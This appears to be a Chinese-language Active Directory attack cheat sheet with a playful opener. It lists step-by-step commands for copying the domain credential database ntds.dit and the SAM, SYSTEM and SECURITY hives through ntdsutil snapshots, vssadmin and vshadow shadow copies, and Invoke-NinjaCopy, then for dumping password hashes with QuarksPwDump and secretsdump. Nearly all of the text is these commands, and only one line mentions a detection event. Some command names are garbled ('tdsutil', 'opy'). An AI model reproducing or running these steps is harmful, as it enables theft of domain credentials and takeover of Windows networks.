「打給賀,挖西飛飛,今天你要來點 Active Directory Security 嗎?」
C:\windows\ntds\ntds.dit
tdsutil snapshot "List All" quit quit
tdsutil snapshot "List Mounted" quit quit
```
(2) 建立快照(會取得 GUID)
- 建立快照時會產生 EventID 98（可作為偵測此操作的依據）
```
tdsutil snapshot "activate instance ntds" create quit quit
```
(3) 掛載(mount)快照(需使用第二步驟取得的GUID)
- 會取得快照掛載的路徑如 `C:\$SNAP_202210121012_VOLUMEC$\`
```
tdsutil snapshot "mount {GUID}" quit quit
```
(4) 複製 ntds.dit
```
opy C:\$SNAP_202210121012_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
```
(5) 卸載(unmount)快照
```
tdsutil snapshot "unmount {GUID}" quit quit
```
(6) 刪除快照
```
tdsutil snapshot "delete {GUID}" quit quit
```
vssadmin list shadows
: 列出硬碟中的快照
vssadmin list writers
: 列出已訂閱的寫入器
vssadmin list shadows
vssadmin create shadow /for=c:
copy \\?\快照路徑\windows\NTDS\ntds.dit c:\ntds.dit
vssadmin delete shadows /for=c: /quiet
vshadow.exe -q
vshadow.exe -p -nw C:
copy Shadow copy device name\windows\NTDS\ntds.dit c:\ntds.dit
vshadow -dx={SnapshotSetID}
vshadow -ds={SnapshotID}
vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:
Import-Module .\invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive
Invoke-NinjaCopy -Path "C:\windows\ntds\ntds.dit" -LocalDestination "C:\Users\Administrator\Desktop\ntds.dit"
esentutl /p /o ntds.dit
QuarksPwDump.exe --dump-hash-domain --output password.txt --ntds-file c:\ntds.dit
secretsdump.exe -sam sam.hiv -security security.hiv -system sys.hiv LOCAL
secretsdump.exe -system system.hive -ntds ntds.dit LOCAL